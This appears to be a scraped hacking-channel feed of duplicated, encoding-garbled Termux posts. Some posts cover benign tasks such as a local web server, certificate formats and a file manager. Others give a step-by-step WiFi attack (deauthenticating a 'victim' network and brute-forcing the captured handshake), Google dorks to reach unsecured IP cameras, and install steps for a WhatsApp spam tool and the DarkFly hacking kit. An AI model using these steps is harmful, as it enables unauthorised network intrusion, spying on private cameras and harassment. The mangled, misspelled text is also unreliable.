β β β Uππ»βΊπ«6π¬πβ β β β
π¦Turn Android Device into a Web Server
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Install & open termux
2οΈβ£$ pkg install git
3οΈβ£$ pkg install golang
4οΈβ£$ export GOPATH=/data/data/com.termux/files/home/go
5οΈβ£$ go get -u -v github.com/kataras/iris
6οΈβ£$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world
7οΈβ£$ go run main.go
8οΈβ£ Open your favorite browser and navigate to http://localhost:8080
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Turn Android Device into a Web Server
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£Install & open termux
2οΈβ£$ pkg install git
3οΈβ£$ pkg install golang
4οΈβ£$ export GOPATH=/data/data/com.termux/files/home/go
5οΈβ£$ go get -u -v github.com/kataras/iris
6οΈβ£$ cd /data/data/com.termux/files/home/go/src/github.com/kataras/iris/_examples/hello-world
7οΈβ£$ go run main.go
8οΈβ£ Open your favorite browser and navigate to http://localhost:8080
Enjoyβ€οΈππ»
β 2020 git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - kataras/iris: The fastest HTTP/2 Go Web Framework. New, modern and easy to learn. Fast development with Code you control.β¦
The fastest HTTP/2 Go Web Framework. New, modern and easy to learn. Fast development with Code you control. Unbeatable cost-performance ratio :rocket: - kataras/iris
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Termux Useful commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Some Termux Useful commands :
pip install youtube-dl For installing Youtube-dl
Packages install python Installs Python
termux-setup-storage Gives TERMUX access to your file system
mkdir βdir-name For creating directory
cd βdir-nameβ For changing directory
cat βfile-nameβ For reading any file
mv /path/file /path where file is moved For moving files from one path to another.
cp /path/file /path where to copy file For copying files from one path
to other
rm filename.file-extension For removing mentioned file from a certain directory.
ping βwebsite URLβ Helps verify IP level connectivity
toilet -f mono12 -F gay βyour textβ Presents text in a specified format.
apt show (app-name) Gives a short but detailed summary on mentioned name of desired app.
apt show (app-name) Installs the desired app
Enjoy β€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How To Hack Wifi Using Termux ?
First connect your wife-adapter to your device :
1οΈβ£Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :
airmon-ng
airmon-ng start wlan0
2οΈβ£ Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.
3οΈβ£ Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.
4οΈβ£Copy victimβs BSSID and also note the target channel CH number and type this command :
airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w
5οΈβ£There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon
6οΈβ£Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
7οΈβ£now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
8οΈβ£ this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)
π¦Tested On:
> root android
> version 6.0
Enjoy β€οΈππ»
powered by Wiki :)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦How To Hack Wifi Using Termux ?
First connect your wife-adapter to your device :
1οΈβ£Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :
airmon-ng
airmon-ng start wlan0
2οΈβ£ Now start the network detecting by typing this command :
airodump-ng wlan0mon
Here you see your target device and stop the detecting by control + z.
3οΈβ£ Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.
4οΈβ£Copy victimβs BSSID and also note the target channel CH number and type this command :
airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w
5οΈβ£There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon
6οΈβ£Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :
aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon
now stop attack by control+z and close the terminal
7οΈβ£now paste the password list in your cap folder and also go into the cap folder directory
Now crack with this command :
aircrack-ng -w pass.list 01.cap
8οΈβ£ this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)
π¦Tested On:
> root android
> version 6.0
Enjoy β€οΈππ»
powered by Wiki :)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
Netcat_vs_Cryptcat_β_Remote_Shell_to_Control_Kali_Linux_from_Windows.pdf
2.2 MB
Netcat vs Cryptcat β Remote Shell to Control Kali Linux from Windows machine
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Key and Certificate Formats :
> Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
1) Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
2) ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require that the server certificate be one in one file, and all intermediate certificates in another.
3) Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
4) ASCII (PEM) key
Contains a base64 encoded DER key , sometimes with additional metadata (for example, the algorithm used for password protection).
5) PKCS # 7 Certificate
A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
6) PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect the server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Key and Certificate Formats :
> Private keys and certificates can be stored in various formats, which means that you often have to convert them from one format to another. The most common formats are:
1) Binary (DER) certificate
Contains an X.509 certificate in raw form using DER ASN.1 encoding.
2) ASCII (PEM) certificate (s)
Contains a base64 encoded DER certificate in which ----- BEGIN CERTIFICATE ----- is used as the header, and ----- END CERTIFICATE ----- is used as the footer. Usually found with only one certificate per file, although some programs allow more than one certificate depending on the context. For example, older versions of the Apache web server require that the server certificate be one in one file, and all intermediate certificates in another.
3) Binary (DER) key
Contains the private key in raw form using DER ASN.1 encoding. OpenSSL creates keys in its own traditional (SSLeay) format. There is also an alternative format called PKCS # 8 (defined in RFC 5208), but it is not used widely. OpenSSL can convert to and from PKCS # 8 format using the pkcs8 command .
4) ASCII (PEM) key
Contains a base64 encoded DER key , sometimes with additional metadata (for example, the algorithm used for password protection).
5) PKCS # 7 Certificate
A complex format for transporting signed or encrypted data, defined in RFC 2315. It is usually found with the extensions .p7b and .p7c and can optionally include the entire certificate chain. This format is supported by the keytool Java utility.
6) PKCS # 12 (PFX) key and certificate (s)
A complex format that can store and protect the server key along with the entire certificate chain. Commonly encountered with extensions .p12 and .pfx . This format is commonly used in Microsoft products, but is also used for client certificates. Nowadays, the name PFX is used as a synonym for PKCS # 12, although in the old days, PFX meant a different format (earlier version of PKCS # 12). It is unlikely that you will meet the old version anywhere.
share usβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TikTok European user privacy protection work will be handed over to Ireland and UK branches on July 29 :
#News
( if you a hater for tiktok call this tracking ennemiesπΊ & and if you love tiktok call this a simple news)
> According to a news release issued by ByteDance on Monday, the responsibility for providing privacy protection for European TikTok users will be transferred to branches in Ireland and the United Kingdom. After the adjustment, the service provider of users in the EEA-Swiss region will be changed to TikTok Ireland, and the same adjustment will be made in the UK region.
>In a statement released today, TikTokβs director of trust and security in Europe, the Middle East, and Africa, Cormac Keenan, and Madeline Moncrieff, director of corporate affairs for EMEA, said the adjustment will take effect on July 29.
π¦In the statement:
> Since the introduction of TikTok to Europe, we have invested in local talent, created a regional senior leadership team, and established the necessary business functions in the region, because we believe this is the best to support our growing TikTok community here the way.
> From July 29, TikTok's Irish and British branches will succeed our US TikTok Inc, provide TikTok to European users, and manage and protect their personal data.
>TikTok has more than 1,000 employees in Europe, of which 800 employees work in the United Kingdom and Ireland. London remains the companyβs main office and its second largest office, and the Trust and Security Center in Dublin is led by Mr. Keenan. In January this year, the company said it would establish a new European base in Dublin, employing 100 employees.
>In the statement: βAs we expand throughout the region, TikTok Ireland has been responsible for maintaining the privacy and security of users in Europe. Our Trust and Security Center in Dublin allows us to focus on strengthening policies, technologies and control strategies, To ensure the safety of our community, our new data privacy team will focus on maintaining the highest standards of data protection. This work is overseen by the Office of the Data Protection Officer to promote accountability and encourage privacy awareness and a culture of compliance."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦TikTok European user privacy protection work will be handed over to Ireland and UK branches on July 29 :
#News
( if you a hater for tiktok call this tracking ennemiesπΊ & and if you love tiktok call this a simple news)
> According to a news release issued by ByteDance on Monday, the responsibility for providing privacy protection for European TikTok users will be transferred to branches in Ireland and the United Kingdom. After the adjustment, the service provider of users in the EEA-Swiss region will be changed to TikTok Ireland, and the same adjustment will be made in the UK region.
>In a statement released today, TikTokβs director of trust and security in Europe, the Middle East, and Africa, Cormac Keenan, and Madeline Moncrieff, director of corporate affairs for EMEA, said the adjustment will take effect on July 29.
π¦In the statement:
> Since the introduction of TikTok to Europe, we have invested in local talent, created a regional senior leadership team, and established the necessary business functions in the region, because we believe this is the best to support our growing TikTok community here the way.
> From July 29, TikTok's Irish and British branches will succeed our US TikTok Inc, provide TikTok to European users, and manage and protect their personal data.
>TikTok has more than 1,000 employees in Europe, of which 800 employees work in the United Kingdom and Ireland. London remains the companyβs main office and its second largest office, and the Trust and Security Center in Dublin is led by Mr. Keenan. In January this year, the company said it would establish a new European base in Dublin, employing 100 employees.
>In the statement: βAs we expand throughout the region, TikTok Ireland has been responsible for maintaining the privacy and security of users in Europe. Our Trust and Security Center in Dublin allows us to focus on strengthening policies, technologies and control strategies, To ensure the safety of our community, our new data privacy team will focus on maintaining the highest standards of data protection. This work is overseen by the Office of the Data Protection Officer to promote accountability and encourage privacy awareness and a culture of compliance."
#News
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Vulnerability Scanners
#FastTips :
> Vulnerability scanners automate security auditing and can play a vital part in your IT security by scanning your network and websites for different security risks. These scanners are also capable of generating a prioritized list of those you should patch, and they also describe the vulnerabilities and provide steps on how to remediate them. It is also possible for some to even automate the patching process.
> One of the best lists of popular vulnerability scanners is maintained by OWASP at:
https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Vulnerability Scanners
#FastTips :
> Vulnerability scanners automate security auditing and can play a vital part in your IT security by scanning your network and websites for different security risks. These scanners are also capable of generating a prioritized list of those you should patch, and they also describe the vulnerabilities and provide steps on how to remediate them. It is also possible for some to even automate the patching process.
> One of the best lists of popular vulnerability scanners is maintained by OWASP at:
https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools
enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
owasp.org
Vulnerability Scanning Tools | OWASP Foundation
Vulnerability Scanning Tools on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of software.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦maybee you have Toolx THE GREAT TOOL
Still need more ?
#tool
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
$ apt update
$ apt upgrade
$ apt install git
$ git clone https://github.com/Ranginang67/DarkFly-Tool
$ cd DarkFly-Tool
$ chmod +x
$ sh install
Run :
$ DarkFly
enjoyβ€οΈππ»
β β β Uππ»βΊπ«6π¬πβ β β β
π¦maybee you have Toolx THE GREAT TOOL
Still need more ?
#tool
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
$ apt update
$ apt upgrade
$ apt install git
$ git clone https://github.com/Ranginang67/DarkFly-Tool
$ cd DarkFly-Tool
$ chmod +x
$ sh install
Run :
$ DarkFly
enjoyβ€οΈππ»
β β β Uππ»βΊπ«6π¬πβ β β β
GitHub
GitHub - Ranginang67/DarkFly-Tool: DarkFly tool V.4.0
DarkFly tool V.4.0. Contribute to Ranginang67/DarkFly-Tool development by creating an account on GitHub.
IP Cams from around the world.pdf
299.3 KB
IP Cams from around the world
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Gain access to unsecured IP cameras with these Google dorks.
β 2020 git source
inurl:/view.shtml
intitle:βLive View / - AXISβ | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:βlive viewβ intitle:axis
intitle:liveapplet
allintitle:βNetwork Camera NetworkCameraβ
intitle:axis intitle:βvideo serverβ
intitle:liveapplet inurl:LvAppl
intitle:βEvoCamβ inurl:βwebcam.htmlβ
intitle:βLive NetSnap Cam-Server feedβ
intitle:βLive View / - AXISβ
intitle:βLive View / - AXIS 206Mβ
intitle:βLive View / - AXIS 206Wβ
intitle:βLive View / - AXIS 210β³
inurl:indexFrame.shtml Axis
inurl:βMultiCameraFrame?Mode=Motionβ
intitle:start inurl:cgistart
intitle:βWJ-NT104 Main Pageβ
intext:βMOBOTIX M1β³ intext:βOpen Menuβ
intext:βMOBOTIX M10β³ intext:βOpen Menuβ
intext:βMOBOTIX D10β³ intext:βOpen Menuβ
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:βsony network camera snc-p1β³
intitle:βsony network camera snc-m1β³
site:.viewnetcam.com -www.viewnetcam.com
intitle:βToshiba Network Cameraβ user login
intitle:βnetcam live imageβ
intitle:βi-Catcher Console - Web Monitorβ
enjoyβ€οΈππ»
β 2020 git source
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Gain access to unsecured IP cameras with these Google dorks.
β 2020 git source
inurl:/view.shtml
intitle:βLive View / - AXISβ | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:βlive viewβ intitle:axis
intitle:liveapplet
allintitle:βNetwork Camera NetworkCameraβ
intitle:axis intitle:βvideo serverβ
intitle:liveapplet inurl:LvAppl
intitle:βEvoCamβ inurl:βwebcam.htmlβ
intitle:βLive NetSnap Cam-Server feedβ
intitle:βLive View / - AXISβ
intitle:βLive View / - AXIS 206Mβ
intitle:βLive View / - AXIS 206Wβ
intitle:βLive View / - AXIS 210β³
inurl:indexFrame.shtml Axis
inurl:βMultiCameraFrame?Mode=Motionβ
intitle:start inurl:cgistart
intitle:βWJ-NT104 Main Pageβ
intext:βMOBOTIX M1β³ intext:βOpen Menuβ
intext:βMOBOTIX M10β³ intext:βOpen Menuβ
intext:βMOBOTIX D10β³ intext:βOpen Menuβ
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:βsony network camera snc-p1β³
intitle:βsony network camera snc-m1β³
site:.viewnetcam.com -www.viewnetcam.com
intitle:βToshiba Network Cameraβ user login
intitle:βnetcam live imageβ
intitle:βi-Catcher Console - Web Monitorβ
enjoyβ€οΈππ»
β 2020 git source
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Whatsapp Spam via Termux :
> unimited messages- Spam Does Not Make You Hackers, Cyber, Cracker, Anonymous And Minions. Spamming Only For Good Purposes Does Not Violate Religious Law And Rules
#FastTips
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
That's All !
enjoyβ€οΈππ»
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Whatsapp Spam via Termux :
> unimited messages- Spam Does Not Make You Hackers, Cyber, Cracker, Anonymous And Minions. Spamming Only For Good Purposes Does Not Violate Religious Law And Rules
#FastTips
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£
$ pkg update upgrade
2οΈβ£$ pkg install git python2 toilet figlet php
3οΈβ£$ git clone https://github.com/4L13199/LITESPAM
4οΈβ£$ cd LITESPAM
use for learnThat's All !
enjoyβ€οΈππ»
β β β Uππ»βΊπ«6π¬πβ β β β
β β β Uππ»βΊπ«6π¬πβ β β β
π¦What is Cloud Commander ?
Cloud Commander is a two-pane web file manager with a console and editor. It will help you manage the server and work with files, directories and programs in a browser on any computer, smartphone or tablet.
π¦Benefits :
>Open source (MIT License).
>Two classic panels.
>Possibility of authorization.
>The client works in a web browser.
>The server runs on Windows, Linux, Mac OS and Android (using Termux).
It can be used locally or remotely.
>Adapts to Screen size.
>3 built-in editors with syntax highlighting support: Dword, Edward and Deepword.
>Console with support for the standard OS command line.
>Written in JavaScript / Node.js.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">curl -sL https://deb.nodesource.com/setup_6.x | </font><font style="vertical-align: inherit;">sudo -E bash -</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
2οΈβ£-------- For version Node.js v7 --------</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
3οΈβ£curl -sL https://deb.nodesource.com/setup_7.x | </font><font style="vertical-align: inherit;">sudo -E bash -</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
4οΈβ£sudo apt-get install -y nodejs</font></font>
(html commandsπ)
5οΈβ£After installing the nodejs and npm packages, let's move on to installing Cloud Commander with the following commands
> <font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo npm i cloudcmd -g</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
> sudo npm i cloudcmd -g --force</font></font>
6οΈβ£to run :
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">cloudcmd</font></font>
7οΈβ£run as root :
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo cloudcmd</font></font>
8οΈβ£Starting from the superuser will allow you to perform any operations and work with any files.
By default, the file manager is available in the browser at http: // localhost: 8000
enjoyβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦What is Cloud Commander ?
Cloud Commander is a two-pane web file manager with a console and editor. It will help you manage the server and work with files, directories and programs in a browser on any computer, smartphone or tablet.
π¦Benefits :
>Open source (MIT License).
>Two classic panels.
>Possibility of authorization.
>The client works in a web browser.
>The server runs on Windows, Linux, Mac OS and Android (using Termux).
It can be used locally or remotely.
>Adapts to Screen size.
>3 built-in editors with syntax highlighting support: Dword, Edward and Deepword.
>Console with support for the standard OS command line.
>Written in JavaScript / Node.js.
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1οΈβ£<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">curl -sL https://deb.nodesource.com/setup_6.x | </font><font style="vertical-align: inherit;">sudo -E bash -</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
2οΈβ£-------- For version Node.js v7 --------</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
3οΈβ£curl -sL https://deb.nodesource.com/setup_7.x | </font><font style="vertical-align: inherit;">sudo -E bash -</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
4οΈβ£sudo apt-get install -y nodejs</font></font>
(html commandsπ)
5οΈβ£After installing the nodejs and npm packages, let's move on to installing Cloud Commander with the following commands
> <font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo npm i cloudcmd -g</font></font><font></font><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
> sudo npm i cloudcmd -g --force</font></font>
6οΈβ£to run :
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">cloudcmd</font></font>
7οΈβ£run as root :
<font style="vertical-align: inherit;"><font style="vertical-align: inherit;">sudo cloudcmd</font></font>
8οΈβ£Starting from the superuser will allow you to perform any operations and work with any files.
By default, the file manager is available in the browser at http: // localhost: 8000
enjoyβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Now you got :
> Two classic panels.
>Possibility of authorization.
>The client works in a web browser.
>The server runs on Windows, Linux, Mac OS and Android (using Termux).
It can be used locally or remotely.
>Adapts to Screen size.
>3 built-in editors with syntax highlighting support: Dword, Edward and Deepword.
>Console with support for the standard OS command line.
>Written in JavaScript / Node.js.
> Two classic panels.
>Possibility of authorization.
>The client works in a web browser.
>The server runs on Windows, Linux, Mac OS and Android (using Termux).
It can be used locally or remotely.
>Adapts to Screen size.
>3 built-in editors with syntax highlighting support: Dword, Edward and Deepword.
>Console with support for the standard OS command line.
>Written in JavaScript / Node.js.
β β β Uππ»βΊπ«6π¬πβ β β β
π¦1οΈβ£AIRMON-NG TUTORIAL
Switch to monitor mode
airmon-ng is a bash script designed to put wireless cards into surveillance (monitor) mode. It also has the option to close programs that interfere with monitor mode. Sometimes it may fail - in these cases it is recommended to use the βmanualβ translation into monitor mode.
π¦1οΈβ£AIRMON-NG TUTORIAL
Switch to monitor mode
airmon-ng is a bash script designed to put wireless cards into surveillance (monitor) mode. It also has the option to close programs that interfere with monitor mode. Sometimes it may fail - in these cases it is recommended to use the βmanualβ translation into monitor mode.